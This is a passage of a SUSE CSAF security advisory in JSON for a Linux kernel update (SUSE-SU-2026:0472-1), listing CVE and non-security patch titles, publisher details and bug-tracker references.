CVE-2025-71149: io_uring/poll: correctly handle io_poll_add() return value on update (bsc#1257164).\n- CVE-2025-71156: gve: defer interrupt enabling until NAPI registration (bsc#1257167).\n- CVE-2025-71157: RDMA/core: always drop device refcount in ib_del_sub_device_and_put() (bsc#1257168).\n- CVE-2026-22976: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset (bsc#1257035).\n- CVE-2026-22977: net: sock: fix hardened usercopy panic in sock_recv_errqueue (bsc#1257053).\n- CVE-2026-22984: libceph: prevent potential out-of-bounds reads in handle_auth_done() (bsc#1257217).\n- CVE-2026-22990: libceph: replace overzealous BUG_ON in osdmap_apply_incremental() (bsc#1257221).\n- CVE-2026-22991: libceph: make free_choose_arg_map() resilient to partial allocation (bsc#1257220).\n- CVE-2026-22992: libceph: return the handler error from mon_handle_auth_done() (bsc#1257218).\n- CVE-2026-22993: idpf: Fix RSS LUT NULL pointer crash on early ethtool operations (bsc#1257180).\n- CVE-2026-22996: net/mlx5e: Don\u0027t store mlx5e_priv in mlx5e_dev devlink priv.\n- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).\n- CVE-2026-23000: net/mlx5e: Fix crash on profile change rollback failure (bsc#1257234).\n- CVE-2026-23001: macvlan: fix possible UAF in macvlan_forward_source() (bsc#1257232).\n- CVE-2026-23005: x86/fpu: Clear XSTATE_BV in guest XSAVE state whenever XFD[i]=1 (bsc#1257245).\n- CVE-2026-23010: ipv6: Fix use-after-free in inet6_addr_del() (bsc#1257332).\n- CVE-2026-23011: ipv4: ip_gre: make ipgre_header() robust (bsc#1257207).\n\nThe following non security issues were fixed:\n\n- ALSA: ctxfi: Fix potential OOB access in audio mixer handling (stable-fixes).\n- ALSA: scarlett2: Fix buffer overflow in config retrieval (git-fixes).\n- ALSA: usb-audio: Fix use-after-free in snd_usb_mixer_free() (git-fixes).\n- ALSA: usb-audio: Update for native DSD support quirks (stable-fixes).\n- ALSA: usb: Increase volume range that triggers a warning (git-fixes).\n- ASoC: amd: yc: Add quirk for Honor MagicBook X16 2025 (stable-fixes).\n- ASoC: codecs: wsa881x: Drop unused version readout (stable-fixes).\n- ASoC: codecs: wsa881x: fix unnecessary initialisation (git-fixes).\n- ASoC: codecs: wsa883x: fix unnecessary initialisation (git-fixes).\n- ASoC: codecs: wsa884x: fix codec initialisation (git-fixes).\n- ASoC: fsl_sai: Add missing registers to cache default (stable-fixes).\n- ASoC: fsl: imx-card: Do not force slot width to sample width (git-fixes).\n- ASoC: Intel: sof_es8336: fix headphone GPIO logic inversion (git-fixes).\n- ASoC: tlv320adcx140: fix null pointer (git-fixes).\n- ASoC: tlv320adcx140: fix word length (git-fixes).\n- ata: libata: Add cpr_log to ata_dev_print_features() early return (git-fixes).\n- Bluetooth: hci_uart: fix null-ptr-deref in hci_uart_write_work (git-fixes).\n- Bluetooth: MGMT: Fix memory leak in set_ssp_complete (git-fixes).\n- bpf: Do not let BPF test infra emit invalid GSO types to stack (bsc#1255569).\n- bpf/selftests: test_select_reuseport_kern: Remove unused header (bsc#1257603).\n- bs-upload-kernel: Fix cve branch uploads.\n- btrfs: do not strictly require dirty metadata threshold for metadata writepages (stable-fixes).\n- can: ctucanfd: fix SSP_SRC in cases when bit-rate is higher than 1 MBit (git-fixes).\n- can: ems_usb: ems_usb_read_bulk_callback(): fix URB memory leak (git-fixes).\n- can: etas_es58x: allow partial RX URB allocation to succeed (git-fixes).\n- can: gs_usb: gs_usb_receive_bulk_callback(): fix error message (git-fixes).\n- can: gs_usb: gs_usb_receive_bulk_callback(): unanchor URL on usb_submit_urb() error (git-fixes).\n- can: j1939: make j1939_session_activate() fail if device is no longer registered (stable-fixes).\n- can: kvaser_usb: kvaser_usb_read_bulk_callback(): fix URB memory leak (git-fixes).\n- can: mcba_usb: mcba_usb_read_bulk_callback(): fix URB memory leak (git-fixes).\n- can: usb_8dev: usb_8dev_read_bulk_callback(): fix URB memory leak (git-fixes).\n- cifs: add new field to track the last access time of cfid (git-fixes).\n- cifs: after disabling multichannel, mark tcon for reconnect (git-fixes).\n- cifs: avoid redundant calls to disable multichannel (git-fixes).\n- cifs: cifs_pick_channel should try selecting active channels (git-fixes).\n- cifs: deal with the channel loading lag while picking channels (git-fixes).\n- cifs: dns resolution is needed only for primary channel (git-fixes).\n- cifs: do not disable interface polling on failure (git-fixes).\n- cifs: do not search for channel if server is terminating (git-fixes).\n- cifs: fix a pending undercount of srv_count (git-fixes).\n- cifs: Fix copy offload to flush destination region (bsc#1252511).\n- cifs: Fix flushing, invalidation and file size with copy_file_range() (bsc#1252511).\n- cifs: fix lock ordering while disabling multichannel (git-fixes).\n- cifs: fix stray unlock in cifs_chan_skip_or_disable (git-fixes).\n- cifs: fix use after free for iface while disabling secondary channels (git-fixes).\n- cifs: handle servers that still advertise multichannel after disabling (git-fixes).\n- cifs: handle when server starts supporting multichannel (git-fixes).\n- cifs: handle when server stops supporting multichannel (git-fixes).\n- cifs: make cifs_chan_update_iface() a void function (git-fixes).\n- cifs: make sure server interfaces are requested only for SMB3+ (git-fixes).\n- cifs: make sure that channel scaling is done only once (git-fixes).\n- cifs: reconnect worker should take reference on server struct unconditionally (git-fixes).\n- cifs: reset connections for all channels when reconnect requested (git-fixes).\n- cifs: reset iface weights when we cannot find a candidate (git-fixes).\n- cifs: serialize other channels when query server interfaces is pending (git-fixes).\n- cifs: update dstaddr whenever channel iface is updated (git-fixes).\n- comedi: dmm32at: serialize use of paged registers (git-fixes).\n- comedi: fix divide-by-zero in comedi_buf_munge() (stable-fixes).\n- comedi: Fix getting range information for subdevices 16 to 255 (git-fixes).\n- cpuset: fix warning when disabling remote partition (bsc#1256794).\n- crypto: authencesn - reject too-short AAD (assoclen\u003c8) to match ESP/ESN spec (git-fixes).\n- dmaengine: apple-admac: Add \u0027apple,t8103-admac\u0027 compatible (git-fixes).\n- dmaengine: at_hdmac: fix device leak on of_dma_xlate() (git-fixes).\n- dmaengine: bcm-sba-raid: fix device leak on probe (git-fixes).\n- dmaengine: dw: dmamux: fix OF node leak on route allocation failure (git-fixes).\n- dmaengine: idxd: fix device leaks on compat bind and unbind (git-fixes).\n- dmaengine: lpc18xx-dmamux: fix device leak on route allocation (git-fixes).\n- dmaengine: omap-dma: fix dma_pool resource leak in error paths (git-fixes).\n- dmaengine: qcom: gpi: Fix memory leak in gpi_peripheral_config() (git-fixes).\n- dmaengine: sh: rz-dmac: Fix rz_dmac_terminate_all() (git-fixes).\n- dmaengine: tegra-adma: Fix use-after-free (git-fixes).\n- dmaengine: ti: dma-crossbar: fix device leak on am335x route allocation (git-fixes).\n- dmaengine: ti: dma-crossbar: fix device leak on dra7x route allocation (git-fixes).\n- dmaengine: ti: k3-udma: fix device leak on udma lookup (git-fixes).\n- dmaengine: xilinx_dma: Fix uninitialized addr_width when \u0027xlnx,addrwidth\u0027 property is missing (git-fixes).\n- dmaengine: xilinx: xdma: Fix regmap max_register (git-fixes).\n- dpll: fix device-id-get and pin-id-get to return errors properly (git-fixes).\n- dpll: fix return value check for kmemdup (git-fixes).\n- dpll: indent DPLL option type by a tab (git-fixes).\n- dpll: Prevent duplicate registrations (git-fixes).\n- dpll: spec: add missing module-name and clock-id to pin-get reply (git-fixes).\n- drm/amd: Clean up kfd node on surprise disconnect (stable-fixes).\n- drm/amd/display: Apply e4479aecf658 to dml (stable-fixes).\n- drm/amd/display: Bump the HDMI clock to 340MHz (stable-fixes).\n- drm/amd/display: Fix DP no audio issue (stable-fixes).\n- drm/amd/display: Initialise backlight level values from hw (git-fixes).\n- drm/amd/display: Respect user\u0027s CONFIG_FRAME_WARN more for dml files (stable-fixes).\n- drm/amd/display: shrink struct members (stable-fixes).\n- drm/amd/pm: Don\u0027t clear SI SMC table when setting power limit (git-fixes).\n- drm/amd/pm: fix race in power state check before mutex lock (git-fixes).\n- drm/amd/pm: fix smu overdrive data type wrong issue on smu 14.0.2 (git-fixes).\n- drm/amd/pm: Workaround SI powertune issue on Radeon 430 (v2) (git-fixes).\n- drm/amdgpu: Fix cond_exec handling in amdgpu_ib_schedule() (git-fixes).\n- drm/amdgpu: fix NULL pointer dereference in amdgpu_gmc_filter_faults_remove (git-fixes).\n- drm/amdgpu: Fix query for VPE block_type and ip_count (stable-fixes).\n- drm/amdgpu: remove frame cntl for gfx v12 (stable-fixes).\n- drm/amdkfd: fix a memory leak in device_queue_manager_init() (git-fixes).\n- drm/amdkfd: Fix improper NULL termination of queue restore SMI event string (stable-fixes).\n- drm/imagination: Wait for FW trace update command completion (git-fixes).\n- drm/imx/tve: fix probe device leak (git-fixes).\n- drm/msm/a6xx: fix bogus hwcg register updates (git-fixes).\n- drm/nouveau: add missing DCB connector types (git-fixes).\n- drm/nouveau: implement missing DCB connector types; gracefully handle unknown connectors (git-fixes).\n- drm/nouveau/disp: Set drm_mode_config_funcs.atomic_(check|commit) (stable-fixes).\n- drm/nouveau/disp/nv50-: Set lock_core in curs507a_prepare (git-fixes).\n- drm/panel-simple: fix connector type for DataImage SCF0700C48GGU18 panel (git-fixes).\n- drm/radeon: Remove __counted_by from ClockInfoArray.clockInfo[] (stable-fixes).\n- drm/vmwgfx: Fix an error return check in vmw_compat_shader_add() (git-fixes).\n- drm/vmwgfx: Merge vmw_bo_release and vmw_bo_free functions (git-fixes).\n- exfat: check return value of sb_min_blocksize in exfat_read_boot_sector (git-fixes).\n- exfat: fix remount failure in different process environments (git-fixes).\n- gpio: omap: do not register driver in probe() (git-fixes).\n- gpio: pca953x: Add support for level-triggered interrupts (stable-fixes).\n- gpio: pca953x: fix wrong error probe return value (git-fixes).\n- gpio: pca953x: handle short interrupt pulses on PCAL devices (git-fixes).\n- gpio: pca953x: Utilise dev_err_probe() where it makes sense (stable-fixes).\n- gpio: pca953x: Utilise temporary variable for struct device (stable-fixes).\n- gpio: rockchip: Stop calling pinctrl for set_direction (git-fixes).\n- HID: usbhid: paper over wrong bNumDescriptor field (stable-fixes).\n- ice: use netif_get_num_default_rss_queues() (bsc#1247712).\n- iio: accel: iis328dq: fix gain values (git-fixes).\n- iio: adc: ad7280a: handle spi_setup() errors in probe() (git-fixes).\n- iio: adc: ad9467: fix ad9434 vref mask (git-fixes).\n- iio: adc: at91-sama5d2_adc: Fix potential use-after-free in sama5d2_adc driver (git-fixes).\n- iio: dac: ad5686: add AD5695R to ad5686_chip_info_tbl (git-fixes).\n- iio: imu: st_lsm6dsx: fix iio_chan_spec for sensors without event detection (git-fixes).\n- Input: i8042 - add quirk for ASUS Zenbook UX425QA_UM425QA (stable-fixes).\n- Input: i8042 - add quirks for MECHREVO Wujie 15X Pro (stable-fixes).\n- intel_th: fix device leak on output open() (git-fixes).\n- leds: led-class: Only Add LED to leds_list when it is fully ready (git-fixes).\n- lib/crypto: aes: Fix missing MMU protection for AES S-box (git-fixes).\n- mei: me: add nova lake point S DID (stable-fixes).\n- mei: me: add wildcat lake P DID (stable-fixes).\n- mISDN: annotate data-race around dev-\u003ework (git-fixes).\n- mm, page_alloc, thp: prevent reclaim for __GFP_THISNODE THP allocations (bsc#1253087).\n- mmc: rtsx_pci_sdmmc: implement sdmmc_card_busy function (git-fixes).\n- mmc: sdhci-of-dwcmshc: Prevent illegal clock reduction in HS200/HS400 mode (git-fixes).\n- net: can: j1939: j1939_xtp_rx_rts_session_active(): deactivate session upon receiving the second rts (git-fixes).\n- net: hv_netvsc: reject RSS hash key programming without RX indirection table (bsc#1257473).\n- net: mana: Add metadata support for xdp mode (git-fixes).\n- net: mana: Add standard counter rx_missed_errors (git-fixes).\n- net: mana: Add support for auxiliary device servicing events (git-fixes).\n- net: mana: Change the function signature of mana_get_primary_netdev_rcu (bsc#1256690).\n- net: mana: Drop TX skb on post_work_request failure and unmap resources (git-fixes).\n- net: mana: fix spelling for mana_gd_deregiser_irq() (git-fixes).\n- net: mana: Fix use-after-free in reset service rescan path (git-fixes).\n- net: mana: Fix warnings for missing export.h header inclusion (git-fixes).\n- net: mana: Handle hardware recovery events when probing the device (git-fixes).\n- net: mana: Handle Reset Request from MANA NIC (git-fixes).\n- net: mana: Handle SKB if TX SGEs exceed hardware limit (git-fixes).\n- net: mana: Handle unsupported HWC commands (git-fixes).\n- net: mana: Move hardware counter stats from per-port to per-VF context (git-fixes).\n- net: mana: Probe rdma device in mana driver (git-fixes).\n- net: mana: Reduce waiting time if HWC not responding (git-fixes).\n- net: tcp: allow zero-window ACK update the window (bsc#1254767).\n- net: usb: dm9601: remove broken SR9700 support (git-fixes).\n- net: wwan: t7xx: fix potential skb-\u003efrags overflow in RX path (git-fixes).\n- nfc: llcp: Fix memleak in nfc_llcp_send_ui_frame() (git-fixes).\n- nfc: nci: Fix race between rfkill and nci_unregister_device() (git-fixes).\n- NFS: Fix up the automount fs_context to use the correct cred (git-fixes).\n- nfsd: Drop the client reference in client_states_open() (git-fixes).\n- NFSD: Fix permission check for read access to executable-only files (git-fixes).\n- NFSD: use correct reservation type in nfsd4_scsi_fence_client (git-fixes).\n- NFSD/blocklayout: Fix minlength check in proc_layoutget (git-fixes).\n- NFSv4: ensure the open stateid seqid doesn\u0027t go backwards (git-fixes).\n- nvme: nvme-fc: move tagset removal to nvme_fc_delete_ctrl() (git-fixes).\n- nvmet-auth: update sc_c in host response (git-fixes).\n- nvmet-auth: update sc_c in target host hash calculation (git-fixes).\n- of: fix reference count leak in of_alias_scan() (git-fixes).\n- of: platform: Use default match table for /firmware (git-fixes).\n- phy: freescale: imx8m-pcie: assert phy reset during power on (stable-fixes).\n- phy: rockchip: inno-usb2: fix communication disruption in gadget mode (git-fixes).\n- phy: rockchip: inno-usb2: fix disconnection in gadget mode (git-fixes).\n- phy: stm32-usphyc: Fix off by one in probe() (git-fixes).\n- phy: tegra: xusb: Explicitly configure HS_DISCON_LEVEL to 0x7 (git-fixes).\n- platform/x86: hp-bioscfg: Fix automatic module loading (git-fixes).\n- platform/x86: hp-bioscfg: Fix kernel panic in GET_INSTANCE_ID macro (git-fixes).\n- platform/x86: hp-bioscfg: Fix kobject warnings for empty attribute names (git-fixes).\n- platform/x86/amd: Fix memory leak in wbrf_record() (git-fixes).\n- pnfs/flexfiles: Fix memory leak in nfs4_ff_alloc_deviceid_node() (git-fixes).\n- powercap: fix race condition in register_control_type() (stable-fixes).\n- powercap: fix sscanf() error return value handling (stable-fixes).\n- powerpc/addnote: Fix overflow on 32-bit builds (bsc#1215199).\n- RDMA/mana_ib: Access remote atomic for MRs (git-fixes).\n- RDMA/mana_ib: add additional port counters (git-fixes).\n- RDMA/mana_ib: Add device statistics support (git-fixes).\n- RDMA/mana_ib: Add port statistics support (git-fixes).\n- RDMA/mana_ib: Add support of 4M, 1G, and 2G pages (git-fixes).\n- RDMA/mana_ib: Add support of mana_ib for RNIC and ETH nic (git-fixes).\n- RDMA/mana_ib: add support of multiple ports (git-fixes).\n- RDMA/mana_ib: Allow registration of DMA-mapped memory in PDs (git-fixes).\n- RDMA/mana_ib: check cqe length for kernel CQs (git-fixes).\n- RDMA/mana_ib: Create and destroy UD/GSI QP (git-fixes).\n- RDMA/mana_ib: create kernel-level CQs (git-fixes).\n- RDMA/mana_ib: create/destroy AH (git-fixes).\n- RDMA/mana_ib: Drain send wrs of GSI QP (git-fixes).\n- RDMA/mana_ib: extend mana QP table (git-fixes).\n- RDMA/mana_ib: Extend modify QP (git-fixes).\n- RDMA/mana_ib: Fix error code in probe() (git-fixes).\n- RDMA/mana_ib: Fix integer overflow during queue creation (git-fixes).\n- RDMA/mana_ib: Handle net event for pointing to the current netdev (bsc#1256690).\n- RDMA/mana_ib: helpers to allocate kernel queues (git-fixes).\n- RDMA/mana_ib: Implement DMABUF MR support (git-fixes).\n- RDMA/mana_ib: implement get_dma_mr (git-fixes).\n- RDMA/mana_ib: implement req_notify_cq (git-fixes).\n- RDMA/mana_ib: indicate CM support (git-fixes).\n- RDMA/mana_ib: polling of CQs for GSI/UD (git-fixes).\n- RDMA/mana_ib: Query feature_flags bitmask from FW (git-fixes).\n- RDMA/mana_ib: request error CQEs when supported (git-fixes).\n- RDMA/mana_ib: support of the zero based MRs (git-fixes).\n- RDMA/mana_ib: UD/GSI QP creation for kernel (git-fixes).\n- RDMA/mana_ib: UD/GSI work requests (git-fixes).\n- RDMA/mana_ib: unify mana_ib functions to support any gdma device (git-fixes).\n- RDMA/mana_ib: Use safer allocation function() (git-fixes).\n- regmap: Fix race condition in hwspinlock irqsave routine (git-fixes).\n- sched: Increase sched_tick_remote timeout (bsc#1254510).\n- sched/rt: Skip group schedulable check with rt_group_sched=0 (bsc#1256568).\n- scsi: lpfc: Rework lpfc_sli4_fcf_rr_next_index_get() (bsc#1256861).\n- scsi: lpfc: Update lpfc version to 14.4.0.13 (bsc#1256861).\n- scsi: qla2xxx: Add bsg interface to support firmware img validation (bsc#1256863).\n- scsi: qla2xxx: Add load flash firmware mailbox support for 28xxx (bsc#1256863).\n- scsi: qla2xxx: Add Speed in SFP print information (bsc#1256863).\n- scsi: qla2xxx: Add support for 64G SFP speed (bsc#1256863).\n- scsi: qla2xxx: Allow recovery for tape devices (bsc#1256863).\n- scsi: qla2xxx: Delay module unload while fabric scan in progress (bsc#1256863).\n- scsi: qla2xxx: Fix bsg_done() causing double free (bsc#1256863).\n- scsi: qla2xxx: Free sp in error path to fix system crash (bsc#1256863).\n- scsi: qla2xxx: Query FW again before proceeding with login (bsc#1256863).\n- scsi: qla2xxx: Update version to 10.02.10.100-k (bsc#1256863).\n- scsi: qla2xxx: Validate MCU signature before executing MBC 03h (bsc#1256863).\n- scsi: qla2xxx: Validate sp before freeing associated memory (bsc#1256863).\n- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).\n- selftests: net: fib-onlink-tests: Convert to use namespaces by default (bsc#1255346).\n- selftests/bpf: Fix flaky bpf_cookie selftest (git-fixes).\n- serial: 8250_pci: Fix broken RS485 for F81504/508/512 (git-fixes).\n- slimbus: core: fix device reference leak on report present (git-fixes).\n- slimbus: core: fix OF node leak on registration failure (git-fixes).\n- slimbus: core: fix of_slim_get_device() kernel doc (git-fixes).\n- slimbus: core: fix runtime PM imbalance on report present (git-fixes).\n- smb: change return type of cached_dir_lease_break() to bool (git-fixes).\n- smb: client: ensure open_cached_dir_by_dentry() only returns valid cfid (git-fixes).\n- smb: client: fix cifs_pick_channel when channel needs reconnect (git-fixes).\n- smb: client: fix warning when reconnecting channel (git-fixes).\n- smb: client: introduce close_cached_dir_locked() (git-fixes).\n- smb: client: remove unused fid_lock (git-fixes).\n- smb: client: short-circuit in open_cached_dir_by_dentry() if !dentry (git-fixes).\n- smb: client: split cached_fid bitfields to avoid shared-byte RMW races (bsc#1250748).\n- smb: client: update cfid-\u003elast_access_time in open_cached_dir_by_dentry() (git-fixes).\n- smb: improve directory cache reuse for readdir operations (bsc#1252712).\n- smb3: add missing null server pointer check (git-fixes).\n- spi: spi-sprd-adi: Fix double free in probe error path (git-fixes).\n- spi: sprd-adi: switch to use spi_alloc_host() (stable-fixes).\n- spi: sprd: adi: Use devm_register_restart_handler() (stable-fixes).\n- svcrdma: return 0 on success from svc_rdma_copy_inline_range (git-fixes).\n- uacce: ensure safe queue release with state management (git-fixes).\n- uacce: fix cdev handling in the cleanup path (git-fixes).\n- uacce: fix isolate sysfs check condition (git-fixes).\n- uacce: implement mremap in uacce_vm_ops to return -EPERM (git-fixes).\n- usb: core: add USB_QUIRK_NO_BOS for devices that hang on BOS descriptor (stable-fixes).\n- usb: dwc3: Check for USB4 IP_NAME (stable-fixes).\n- USB: OHCI/UHCI: Add soft dependencies on ehci_platform (stable-fixes).\n- USB: serial: ftdi_sio: add support for PICAXE AXE027 cable (stable-fixes).\n- USB: serial: option: add Telit LE910 MBIM composition (stable-fixes).\n- usbnet: limit max_mtu based on device\u0027s hard_mtu (git-fixes).\n- w1: fix redundant counter decrement in w1_attach_slave_device() (git-fixes).\n- w1: therm: Fix off-by-one buffer overflow in alarms_store (git-fixes).\n- wifi: ath10k: fix dma_free_coherent() pointer (git-fixes).\n- wifi: ath12k: fix dma_free_coherent() pointer (git-fixes).\n- wifi: mac80211: correctly decode TTLM with default link map (git-fixes).\n- wifi: mac80211: don\u0027t perform DA check on S1G beacon (git-fixes).\n- wifi: mwifiex: Fix a loop in mwifiex_update_ampdu_rxwinsize() (git-fixes).\n- wifi: rsi: Fix memory corruption due to not set vif driver data size (git-fixes).\n- x86: make page fault handling disable interrupts properly (git-fixes).\n- x86/microcode: Fix Entrysign revision check for Zen1/Naples (bsc#1256528).\n- x86/microcode/AMD: Add more known models to entry sign checking (bsc#1256528).\n- x86/microcode/AMD: Add some forgotten models to the SHA check (bsc#1256528).\n- x86/microcode/AMD: Add TSA microcode SHAs (bsc#1256528).\n- x86/microcode/AMD: Add Zen5 model 0x44, stepping 0x1 minrev (bsc#1256528).\n- x86/microcode/AMD: Clean the cache if update did not load microcode (bsc#1256528).\n- x86/microcode/AMD: Extend the SHA check to Zen5, block loading of any unreleased standalone Zen5 microcode patches (bsc#1256528).\n- x86/microcode/AMD: Fix __apply_microcode_amd()\u0027s return value (bsc#1256528).\n- x86/microcode/AMD: Fix Entrysign revision check for Zen5/Strix Halo (bsc#1256528).\n- x86/microcode/AMD: Limit Entrysign signature checking to known generations (bsc#1256528).\n- x86/microcode/AMD: Load only SHA256-checksummed patches (bsc#1256528).\n- x86/microcode/AMD: Use sha256() instead of init/update/final (bsc#1256528).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-472,SUSE-SLE-Module-Public-Cloud-15-SP7-2026-472",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_0472-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:0472-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260472-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:0472-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024141.html"
},
{
"category": "self",
"summary": "SUSE Bug 1205462",
"url": "https://bugzilla.suse.com/1205462"
},
{
"category": "self",
"summary": "SUSE Bug 1214285",
"url": "https://bugzilla.suse.com/1214285"
},
{
"category": "self",
"summary": "SUSE Bug 1215199",
"url": "https://bugzilla.suse.com/1215199"
},
{
"category": "self",
"summary": "SUSE Bug 1223800",
"url": "https://bugzilla.suse.com/1223800"
},
{
"category": "self",
"summary": "SUSE Bug 1228490",
"url": "https://bugzilla.suse.com/1228490"
},
{
"category": "self",
"summary": "SUSE Bug 1233563",
"url": "https://bugzilla.suse.com/1233563"
},
{
"category": "self",
"summary": "SUSE Bug 1234842",
"url": "https://bugzilla.suse.com/1234842"
},
{
"category": "self",
"summary": "SUSE Bug 1235566",
"url": "https://bugzilla.suse.com/1235566"
},
{
"category": "self",
"summary": "SUSE Bug 1241437",
"url": "https://bugzilla.suse.com/1241437"
},
{
"category": "self",
"summary": "SUSE Bug 1242505",
"url": "https://bugzilla.suse.com/1242505"
},
{
"category": "self",
"summary": "SUSE Bug 1242909",
"url": "https://bugzilla.suse.com/1242909"
},
{
"category": "self",
"summary": "SUSE Bug 1243662",
"url": "https://bugzilla.suse.com/1243662"
},
{
"category": "self",
"summary": "SUSE Bug 1243677",
"url": "https://bugzilla.suse.com/1243677"
},
{
"category": "self",
"summary": "SUSE Bug 1243678",
"url": "https://bugzilla.suse.com/1243678"
},
{
"category": "self",
"summary": "SUSE Bug 1245538",
"url": "https://bugzilla.suse.com/1245538"
},
{
"category": "self",
"summary": "SUSE Bug 1246022",
"url": "https://bugzilla.suse.com/1246022"
},
{
"category": "self",
"summary": "SUSE Bug 1246184",
"url": "https://bugzilla.suse.com/1246184"
},
{
"category": "self",
"summary": "SUSE Bug 1246447",
"url": "https://bugzilla.suse.com/1246447"
},
{
"category": "self",
"summary": "SUSE Bug 1247030",
"url": "https://bugzilla.suse.com/1247030"
},
{
"category": "self",
"summary": "SUSE Bug 1247712",
"url": "https://bugzilla.suse.com/1247712"
},
{
"category": "self",
"summary": "SUSE Bug 1248211",
"url": "https://bugzilla.suse.com/1248211"
},
{
"category": "self",
"summary": "SUSE Bug 1249307",
"url": "https://bugzilla.suse.com/1249307"
},
{
"category": "self",
"summary": "SUSE Bug 1249904",
"url": "https://bugzilla.suse.com/1249904"
},
{
"category": "self",
"summary": "SUSE Bug 1250032",
"url": "https://bugzilla.suse.com/1250032"
},
{
"category": "self",
"summary": "SUSE Bug 1250082",
"url": "https://bugzilla.suse.com/1250082"
},
{
"category": "self",
"summary": "SUSE Bug 1250388",
"url": "https://bugzilla.suse.com/1250388"
},
{
"category": "self",
"summary": "SUSE Bug 1250705",
"url": "https://bugzilla.suse.com/1250705"
},
{
"category": "self",
"summary": "SUSE Bug 1250748",
"url": "https://bugzilla.suse.com/1250748"
},
{
"category": "self",
"summary": "SUSE Bug 1252511",
"url": "https://bugzilla.suse.com/1252511"
},
{
"category": "self",
"summary": "SUSE Bug 1252712",
"url": "https://bugzilla.suse.com/1252712"
},
{
"category": "self",
"summary": "SUSE Bug 1252891",
"url": "https://bugzilla.suse.com/1252891"
},
{
"category": "self",
"summary": "SUSE Bug 1252900",
"url": "https://bugzilla.suse.com/1252900"
},
{
"category": "self",
"summary": "SUSE Bug 1253087",
"url": "https://bugzilla.suse.com/1253087"
},
{
"category": "self",
"summary": "SUSE Bug 1253330",
"url": "https://bugzilla.suse.com/1253330"
},
{
"category": "self",
"summary": "SUSE Bug 1253340",
"url": "https://bugzilla.suse.com/1253340"
},
{
"category": "self",
"summary": "SUSE Bug 1253348",
"url": "https://bugzilla.suse.com/1253348"
},
{
"category": "self",
"summary": "SUSE Bug 1253433",
"url": "https://bugzilla.suse.com/1253433"
},
{
"category": "self",
"summary": "SUSE Bug 1253443",
"url": "https://bugzilla.suse.com/1253443"
},
{
"category": "self",
"summary": "SUSE Bug 1253451",
"url": "https://bugzilla.suse.com/1253451"
},
{
"category": "self",
"summary": "SUSE Bug 1253471",
"url": "https://bugzilla.suse.com/1253471"
},
{
"category": "self",
"summary": "SUSE Bug 1253739",
"url": "https://bugzilla.suse.com/1253739"
},
{
"category": "self",
"summary": "SUSE Bug 1254244",
"url": "https://bugzilla.suse.com/1254244"
},
{
"category": "self",
"summary": "SUSE Bug 1254447",
"url": "https://bugzilla.suse.com/1254447"
},
{
"category": "self",
"summary": "SUSE Bug 1254465",
"url": "https://bugzilla.suse.com/1254465"
},
{
"category": "self",
"summary": "SUSE Bug 1254510",
"url": "https://bugzilla.suse.com/1254510"
},
{
"category": "self",
"summary": "SUSE Bug 1254624",
"url": "https://bugzilla.suse.com/1254624"
},
{
"category": "self",
"summary": "SUSE Bug 1254767",
"url": "https://bugzilla.suse.com/1254767"
},
{
"category": "self",
"summary": "SUSE Bug 1254835",
"url": "https://bugzilla.suse.com/1254835"
},
{
"category": "self",
"summary": "SUSE Bug 1254839",
"url": "https://bugzilla.suse.com/1254839"
},
{
"category": "self",
"summary": "SUSE Bug 1254842",
"url": "https://bugzilla.suse.com/1254842"
},
{
"category": "self",
"summary": "SUSE Bug 1254845",
"url": "https://bugzilla.suse.com/1254845"
},
{
"category": "self",
"summary": "SUSE Bug 1254852",
"url": "https://bugzilla.suse.com/1254852"
},
{
"category": "self",
"summary": "SUSE Bug 1254871",
"url": "https://bugzilla.suse.com/1254871"
},
{
"category": "self",
"summary": "SUSE Bug 1255102",
"url": "https://bugzilla.suse.com/1255102"
},
{
"category": "self",
"summary": "SUSE Bug 1255120",
"url": "https://bugzilla.suse.com/1255120"
},
{
"category": "self",
"summary": "SUSE Bug 1255128",
"url": "https://bugzilla.suse.com/1255128"
},
{
"category": "self",
"summary": "SUSE Bug 1255138",
"url": "https://bugzilla.suse.com/1255138"
},
{
"category": "self",
"summary": "SUSE Bug 1255140",
"url": "https://bugzilla.suse.com/1255140"
},
{
"category": "self",
"summary": "SUSE Bug 1255157",
"url": "https://bugzilla.suse.com/1255157"
},
{
"category": "self",
"summary": "SUSE Bug 1255164",
"url": "https://bugzilla.suse.com/1255164"
},
{
"category": "self",
"summary": "SUSE Bug 1255172",
"url": "https://bugzilla.suse.com/1255172"
},
{
"category": "self",
"summary": "SUSE Bug 1255216",
"url": "https://bugzilla.suse.com/1255216"
},
{
"category": "self",
"summary": "SUSE Bug 1255226",
"url": "https://bugzilla.suse.com/1255226"
},
{
"category": "self",
"summary": "SUSE Bug 1255241",
"url": "https://bugzilla.suse.com/1255241"
},
{
"category": "self",
"summary": "SUSE Bug 1255255",
"url": "https://bugzilla.suse.com/1255255"
},
{
"category": "self",
"summary": "SUSE Bug 1255260",
"url": "https://bugzilla.suse.com/1255260"
},
{
"category": "self",
"summary": "SUSE Bug 1255261",
"url": "https://bugzilla.suse.com/1255261"
},
{
"category": "self",
"summary": "SUSE Bug 1255266",
"url": "https://bugzilla.suse.com/1255266"
},
{
"category": "self",
"summary": "SUSE Bug 1255268",
"url": "https://bugzilla.suse.com/1255268"
},
{
"category": "self",
"summary": "SUSE Bug 1255269",
"url": "https://bugzilla.suse.com/1255269"
},
{
"category": "self",
"summary": "SUSE Bug 1255327",
"url": "https://bugzilla.suse.com/1255327"
},
{
"category": "self",
"summary": "SUSE Bug 1255346",
